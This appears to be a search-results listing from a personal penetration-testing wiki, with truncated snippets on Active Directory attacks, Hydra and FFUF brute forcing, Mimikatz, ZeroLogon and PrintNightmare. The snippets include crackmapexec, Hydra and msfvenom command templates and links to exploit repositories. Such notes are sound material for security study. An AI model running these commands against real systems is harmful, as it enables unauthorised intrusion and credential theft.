Search Results

100 total results found

Notes & Cheat Sheets

Active Directory

active-directory

Hash Reversing

hashes
hashing
encryption
hash

Web

css
javascript
http
html
www
web

Nmap

networking
nmap

Network Pivoting

networking
lateral-movement
pivoting

File Transfers and Data Exfiltration

data-exfiltration
file-transfer

Field Observations

target-database
field-observations

IT Notes

networking
netadmin
network-administration
sysadmin
systems-administration
IT
information-technology

Kali Optimizations

Post Exploitation: Enumeration

Active Directory

active-directory
post-exploitation

Post Exploitation: Attacks

Active Directory

attack-vectors
post-exploitation
active-directory

FFUF

Web

web
brute-force
ffuf

Hydra

Web

brute-force
hydra
web

Port Forwarding

Network Pivoting

port-forwarding

gobuster

Web

gobuster

Web

Field Observations

web

Automation with Ansible

IT Notes

ansible
automation
information-technology

FleetDM On Debian 11

IT Notes

defend
osquery
fleetdm

Initial Attack Vectors

Active Directory

Internal: Attack vectors that are ideal for internal penetration tests, where the attacker plants a device on the network or uploads tools to a compromised host. External: Attack vectors that could work in both internal and external ...

active-directory
attack-vectors

Wazuh Notes

IT Notes

A place to keep cheat sheets and configuration guides related to Wazuh that are otherwise too short for a blog post.

defend
siem
wazuh

Proxmox Notes

IT Notes

home-lab
proxmox

LLMNR Poisoning (Internal)

Active Directory Initial Attack Vectors

Note: Network Environment Given that LLMNR is a name resolution protocol that works on the Local Area Network (LAN), this attack method cannot be performed from a different subnet. The attacker would have to compromise a host on the LAN and upload tools, or p...

llmnr
internal
llmnr-poisoning

SMB Relay (Internal/External)

Active Directory Initial Attack Vectors

Note: Network Environment This attack works best in a flat network. However, as long as the attacker machine and target(s) are routeable and no firewalls are blocking required ports, it could work across network segments. What is SMB Relay? A man-in-the-m...

smb
active-directory
external
internal

IPv6 DNS Spoofing (Internal)

Active Directory Initial Attack Vectors

Note: Network Environment This spoofing attack works by sending a router announcement to multicast ff02::1. Therefore, it will only affect domain-joined hosts on the same segment as the attacker machine. What is IPv6 DNS Spoofing? An attacker announc...

ipb6
active-directory
internal

Passback Attacks (Internal/External)

Active Directory Initial Attack Vectors

What's the Flaw? Usually involves an insecure device -- like a printer or multifunction device -- which is configured with an LDAP or SMTP client and credentials. It could be a web server too -- where there is an LDAP or SMTP client. The credentials are usual...

internal
passback
active-directory
external

PowerView

Active Directory Post Exploitation: Enumeration

Overview A set of PowerShell functions that can be used to enumerate Active Directory. Part of the larger PowerSploit Framework. Usage Transfer PowerView.ps1 to the compromised target. Requires a PowerShell session. Then, source the file into the current se...

BloodHound

Active Directory Post Exploitation: Enumeration

1. Installation sudo apt install -y neo4j bloodhound 2. Setup sudo neo4j console & Navigate to http://localhost:7474 Login is neo4j and change the default password sudo bloodhound & Log into the neo4j user account with the new password 3. Da...

Manual Enumeration

Active Directory Post Exploitation: Enumeration

Users net.exe Local net user net user <username> Domain net user /domain net user <username> /domain PowerShell Local Get-LocalUser Domain # Can enumerate specific users by changing the search filter $dom = [System.DirectoryServices.Active...

Pass the Password

Active Directory Post Exploitation: Attacks

Overview Cracked a hash or discovered a password for a domain user. Use the password and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential. Attack 1: crackmapexec sudo crackmapexec smb <target-or...

Pass the Hash

Active Directory Post Exploitation: Attacks

Overview Dumped the SAM or LSA and now have hashes for domain or local users. Use the hash and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential. Anatomy of a Windows Hash username:SID:LM_HASH:NT...

Token Impersonation

Active Directory Post Exploitation: Attacks

Overview Tokens are temporary keys that allow a user to perform actions on a system or network without having to provide a password; similar to session cookies on a web site. The tokens are generated once a user logs onto a system or RDP session. They remain unt...

Kerberoasting

Active Directory Post Exploitation: Attacks

Overview The attacker uses a known username and password of a user on a domain. A typical Kerberos workflow is: Once a user logs into a domain-joined system, they get a TGT (ticket-granting ticket). Then, they'll use that TGT to request a TGS (ticket-gra...

Group Policy Preferences (GPP)

Active Directory Post Exploitation: Attacks

Overview GPP allows admins to create policies with embedded credentials. The credentials are encrypted and stored in a cPassword. The key was accidentally released. What's the Flaw? The MS14-025 patch does not apply to GPP passwords embedded prior to the ...

PrintNightmare

Active Directory Post Exploitation: Attacks

Local Privilege Escalation https://github.com/calebstewart/CVE-2021-1675

PrintNightmare (Internal/External)

Active Directory Initial Attack Vectors

Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell. Create payload msfvenom -p <payload> LHOST=<kali-ip...

print-nightmare
active-directory
external
internal

Mimikatz

Active Directory Post Exploitation: Attacks

Overview https://github.com/gentilkiwi/mimikatz There are various spin-offs of the Mimikatz project, including a PowerShell variety. Mimikatz is primarily used to dump hashes from LSASS, pass hashes, or generate Kerberos tickets for use in attacks. ...

ZeroLogon

Active Directory Post Exploitation: Attacks

Caution This can potentially break a domain controller, due to the fact that this attack temporarily removes the password from a domain controller. After testing this attack, the original password should be restored. ZeroLogon Checker https://github.com/Secu...

AES 256 ECB

Hash Reversing

Example from Vulnhub https://www.vulnhub.com/entry/prime-1,358/ In this challenge, a script outputs an AES-256 encrypted file and a hint in key.txt. The hint says to hash the word "ippsec" with the MD5 algorithm. This is the key to decrypt the hash. Hash Base 6...

aes-256-ecb
aes
hash

Use FFUF to Brute Force Login

Web FFUF

Brute Force with a Request File Start Burp. Make a randomized login to the target web page. Copy the output, for example: POST /login HTTP/1.1 Host: 10.10.10.10 Content-Length: 37 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT ...

Brute Forcing Logins with Hydra

Web Hydra

Example Usage hydra -IVVf [ip-or-hostname] -t [threads] -l [username] -P [password-list] [http-<method>-form] [path-to-login-page:<username-param>=^USER^&<password-param>=^PASS^&<additional-form-param>=[param-value]:<login-error-message>:<session-id> I like ...

Nmap Scanning with Categories

Nmap

Example 1: Nmap script scan with categories Categories https://nmap.org/book/nse-usage.html#nse-categories auth broadcast brute default discovery dos exploit external fuzzer intrusive malware safe version vuln # Scan UDP/161 with all snmp-* scripts # Do ...